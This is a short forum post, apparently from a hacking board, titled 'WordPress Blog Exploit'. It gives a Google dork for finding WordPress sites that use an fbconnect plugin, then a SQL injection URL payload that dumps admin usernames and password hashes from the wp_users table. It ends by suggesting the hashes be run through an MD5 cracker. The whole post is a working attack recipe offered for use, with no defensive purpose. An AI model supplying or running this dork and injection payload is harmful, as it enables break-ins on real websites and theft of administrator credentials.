WordPress Blog Exploit


First of all use Google Dork to find out such Sites


Dork: inurl:"fbconnect_action=myhome"



You will be get such info of admin on page



Just change this part of URL :
?fbconnect_action=myhome&userid=

With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--



Now You will be get Username and Password of Admin

Than Just Encrypt Password In any MD5 Cracker
Quick reply to this message Reply   Reply With Quote Reply With Quote   Multi-Quote This Message